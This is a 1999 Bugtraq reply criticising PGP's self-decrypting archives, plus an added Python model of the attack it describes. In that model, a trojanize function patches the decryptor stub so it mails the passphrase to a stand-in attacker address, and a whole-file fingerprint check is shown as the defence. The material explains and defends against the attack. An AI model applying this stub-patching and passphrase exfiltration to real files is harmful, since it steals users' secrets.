[11006] in bugtraq


Re: PGP 6.5.1 has been released

daemon@ATHENA.MIT.EDU (Mark Wooding)
Tue Jul 13 14:13:01 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-Id:  <14219.869.178793.725790@catbert.ebi.ac.uk>
Date:         Tue, 13 Jul 1999 10:14:13 +0100
Reply-To: Mark Wooding <mdw@EBI.AC.UK>
From: Mark Wooding <mdw@EBI.AC.UK>
X-To:         BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <19990711140519.76348.qmail@hotmail.com>

___Viper___ _ <viper_____@HOTMAIL.COM> wrote:

> "Having the option" never hurt anyone.  You can produce SDAs, and use
> them if you wish, AND you can NOT open executables that arrived in
> your mailbox and you don't trust.

In this particular case, it's even sillier than usual.

There's now an active attack against symmetric passphrases.  I can
fiddle with an SDA in transit so that it does its job normally and also
emails me the passphrase that successfully decrypted the archive.

So basically it's `protected by PGP's strong cryptography' which is
entirely wasted by a brain-damaged idea that some marketroid probably
thought would look kewl with a tick in the box next to it.

And that's without Steven Bellovin's completely legitimate concerns
about `executable content' in general: rich computing experiences and
all that.

Duh.

> It's madness to say that it is a "security threat".  With your logic,
> e-mailing is a security threat as well ;-) Who knows what you can send
> over e-mail !

Quite so.  I make sure that my mail reader won't do anything with a
message other than display it in a text window until I've had a chance
to examine it and decide what should happen next.

Executable email messages are one of the worst ideas I've ever heard
of.  And that's saying something.

[Thanks to Clive Jones, who came up with the attack above.]

-- [mdw]
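The attack Mark describes, modelled as an added example (not code from the original post, and not PGP's SDA format or code): a toy self-decrypting archive whose decryptor stub is Python source that the runner exec()s in place of native code, a toy HMAC-based stream cipher, and a list standing in for the attacker's mail server. Everything here (MAGIC, the file layout, the helper names, the sample passphrase) is constructed for the illustration. Patching the stub does not disturb the ciphertext or its tag, so the patched archive still decrypts; the only check that helps is one run by trusted code over the whole file, against a fingerprint obtained out of band, before anything in it executes.

```python
import hashlib
import hmac

MAGIC = b"TOYSDA1\n"
ATTACKER_MAILBOX = []   # stands in for the attacker's mail server (constructed)

def send_mail(to, body):
    """Anything an executable can do, the stub can do, e.g. send mail."""
    ATTACKER_MAILBOX.append(body)

def derive_key(passphrase, salt):
    # Low iteration count so the example runs quickly; use far more in practice.
    return hashlib.pbkdf2_hmac("sha256", passphrase, salt, 2000, dklen=32)

def keystream_xor(key, nonce, data):
    """Toy stream cipher: XOR with an HMAC-SHA256(key, nonce||counter) keystream."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hmac.new(key, nonce + i.to_bytes(4, "big"), "sha256").digest()
        out.extend(a ^ b for a, b in zip(data[i:i + 32], block))
    return bytes(out)

# The decryptor stub as shipped.  In a real SDA this is native code; here it is
# Python source that run_sda() exec()s.  Its tag check tells it (and anyone who
# has patched it) when the passphrase is the right one.
STUB_SOURCE = '''
def decrypt(payload, passphrase):
    salt, nonce, tag, ct = payload[:16], payload[16:32], payload[32:64], payload[64:]
    key = derive_key(passphrase, salt)
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, "sha256").digest()):
        raise ValueError("bad passphrase")
    return keystream_xor(key, nonce, ct)
'''

def pack(stub, payload):
    return MAGIC + len(stub).to_bytes(4, "big") + stub + payload

def split_sda(archive):
    if not archive.startswith(MAGIC):
        raise ValueError("not a toy SDA")
    n = int.from_bytes(archive[8:12], "big")
    return archive[12:12 + n], archive[12 + n:]

def build_sda(plaintext, passphrase, salt, nonce):
    key = derive_key(passphrase, salt)
    ct = keystream_xor(key, nonce, plaintext)
    tag = hmac.new(key, nonce + ct, "sha256").digest()
    return pack(STUB_SOURCE.encode(), salt + nonce + tag + ct)

def run_sda(archive, passphrase):
    """The recipient double-clicks: whatever code is in the stub runs."""
    stub, payload = split_sda(archive)
    ns = {"hmac": hmac, "derive_key": derive_key,
          "keystream_xor": keystream_xor, "send_mail": send_mail}
    exec(stub.decode(), ns)
    return ns["decrypt"](payload, passphrase)

def trojanize(archive):
    """In-transit edit: leave the ciphertext alone, patch the stub so that it
    mails the passphrase once the tag check has shown it to be right."""
    stub, payload = split_sda(archive)
    hostile = stub.decode().replace(
        "    return keystream_xor(key, nonce, ct)",
        "    send_mail('attacker@example.invalid', passphrase)\n"
        "    return keystream_xor(key, nonce, ct)")
    assert hostile != stub.decode(), "patch point not found"
    return pack(hostile.encode(), payload)

def fingerprint(archive):
    return hashlib.sha256(archive).hexdigest()

def verify_fingerprint(archive, expected_hex):
    """Check the WHOLE file with trusted code against a value obtained out of
    band.  A check inside the stub would be worthless: the attacker edits the stub."""
    return hmac.compare_digest(fingerprint(archive), expected_hex)

def safe_run_sda(archive, passphrase, expected_hex):
    if not verify_fingerprint(archive, expected_hex):
        raise ValueError("archive modified in transit; refusing to run")
    return run_sda(archive, passphrase)

def demo(plaintext=b"the secret report", passphrase=b"correct horse"):
    """Run the genuine and the patched archive; return what each did."""
    ATTACKER_MAILBOX.clear()
    salt, nonce = bytes(range(16)), bytes(range(16, 32))  # fixed, for repeatability
    original = build_sda(plaintext, passphrase, salt, nonce)
    expected = fingerprint(original)   # e.g. read out over the phone
    hostile = trojanize(original)
    r = {"original_ok": run_sda(original, passphrase) == plaintext,
         "leaked_by_original": list(ATTACKER_MAILBOX)}
    r["hostile_ok"] = run_sda(hostile, passphrase) == plaintext
    r["leaked_by_hostile"] = list(ATTACKER_MAILBOX)
    r["original_passes_check"] = verify_fingerprint(original, expected)
    r["hostile_passes_check"] = verify_fingerprint(hostile, expected)
    return r

if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v!r}")
```

Run it and the hostile archive decrypts exactly as the genuine one does, while ATTACKER_MAILBOX ends up holding the passphrase; only verify_fingerprint tells the two apart. A real SDA's stub is native code, so the patch is a binary edit rather than a string replace, but the shape of the attack is the same: the passphrase protects the payload, not the program that asks for it.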
